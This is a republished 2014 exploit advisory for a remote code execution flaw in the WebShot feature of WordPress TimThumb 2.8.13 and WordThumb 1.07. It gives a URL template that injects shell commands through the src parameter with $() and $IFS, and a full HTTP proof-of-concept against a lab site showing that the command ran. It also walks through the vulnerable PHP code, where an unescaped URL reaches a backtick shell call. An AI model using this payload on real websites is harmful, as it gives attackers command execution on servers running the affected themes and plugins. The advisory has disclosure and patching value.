扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 |
###################################################################### #_ ____ _______________ #| | / _ \| \ | |/ ___|/ ___|/ \|_ _| #| || | | |\| | |_| | / _ \ | | #| |__| |_| | |\| |_| | |___ / ___ \| | #|_____\___/|_| \_|\____|\____/_/ \_\_| # # WordPress TimThumb 2.8.13 WebShot Remote Code Execution (0-day) # Affected website : a lot WordPress Themes, Plugins, 3rd party components # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : June 24, 2014 # # Special Thanks to 2600 Thailand group # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ TimThumb is a small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications. Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes. http://www.binarymoon.co.uk/projects/timthumb/ https://code.google.com/p/timthumb/ The original projectWordThumb 1.07 also vulnerable ( https://code.google.com/p/wordthumb/) They both shared exactly the same WebShot code! And there are several projects that shipped with "timthumb.php", such as, Wordpress Gallery Plugin https://wordpress.org/plugins/wordpress-gallery-plugin/ IGIT Posts Slider Widget <blockquote class="wp-embedded-content" data-secret="2evgOz1ASi"><a href="https://wordpress.org/plugins/igit-posts-slider-widget/" target="_blank"rel="external nofollow" class="external" >IGIT Posts Slider Widget</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“IGIT Posts Slider Widget” — Plugin Directory" src="https://wordpress.org/plugins/igit-posts-slider-widget/embed/#?secret=YpTkM2gTL2#?secret=2evgOz1ASi" data-secret="2evgOz1ASi" frameborder="0" marginmarginscrolling="no"></iframe> All themes from http://themify.me/ contains vulnerable "wordthumb" in "<theme-name>/themify/img.php". [+] Exploit ============================================================ http:// <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http:// <wp-website>$(<os-cmds>) ** Note that OS commands payload MUST be within following character sets: [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=] ** Spaces, Pipe, GT sign are not allowed. ** This WebShot feature is DISABLED by default. ** CutyCapt and XVFB must be installed in constants. [+] Proof-of-Concept ============================================================ There are couple techniques that can be used to bypass limited charsets but I will use a shell variable $IFS insteads of space in this scenario. PoC Environment: Ubuntu 14.04 LTS PHP 5.5.9 Wordpress 3.9.1 Themify Parallax Theme 1.5.2 WordThumb 1.07 Crafted Exploit: http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat) GET /wp-content/themes/parallax/themify/img.php?webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1 Host: longcatlab.local Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: woocommerce_recently_viewed=9%7C12%7C16; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685 HTTP/1.1 400 Bad Request Date: Tue, 24 Jun 2014 07:20:48 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 3059 Connection: close Content-Type: text/html … <a href='http://www.php.net/function.getimagesize' target='_new'>getimagesize</a> ()</td><td title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php' bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr> </table></font> <h1>A WordThumb error has occured</h1>The following error(s) occured:<br /><ul><li>The image being resized is not a valid gif, jpg or png.</li></ul><br /><br />Query String : webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version : 1.07</pre> Even it response with error messages but injected OS command has already been executed. $ ls /tmp/longcat -lha - -rw-r--r-- 1 www-data www-data 0 มิ.ย.24 14:20 /tmp/longcat [+] Vulnerability Analysis ============================================================ https://timthumb.googlecode.com/svn/trunk/timthumb.php Filename: timthumb.php if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt'); if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); ... timthumb::start(); ← start script ... public static function start(){ $tim = new timthumb(); ← create timthumb object, call __construct() ... $tim->run(); ... public function __construct(){ ... $this->src = $this->param('src'); ← set "src" variable to HTTP GET "src" parameter … if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ ... $this->isURL = true; ← prefix http/s result in isURL = true } ... protected function param($property, $default = ''){ if (isset ($_GET[$property])) { return $_GET[$property]; ... public function run(){ if($this->isURL){ ... if($this->param('webshot')){ ← HTTP GET "webshot" must submitted if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true ... $this->serveWebshot(); ← call webshot feature } else { ... protected function serveWebshot(){ ... if(! is_file(WEBSHOT_CUTYCAPT)){ ← check existing of cutycapt return $this->error("CutyCapt is not installed. $instr"); } if(! is_file(WEBSHOT_XVFB)){ ← check existing of xvfb return $this->Error("Xvfb is not installed. $instr"); } ... $url = $this->src; if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check valid URL #LoL return $this->error("Invalid URL supplied."); } $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url);← check valid URL as specified in RFC 3986 http://www.ietf.org/rfc/rfc3986.txt ... if(WEBSHOT_XVFB_RUNNING){ putenv('DISPLAY=:100.0'); $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ← OS shell command injection } else { $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ← OS shell command injection } ... $out = <code>$command</code>;← execute $command as shell command "PHP supports one execution operator: backticks (<code></code>). Note that these are not single-quotes! PHP will attempt to execute the contents of the backticks as a shell command." - http://www.php.net//manual/en/language.operators.execution.php "$url" is failed to escape "$()" in "$command" which is result in arbitrary code execution. |
体验盒子
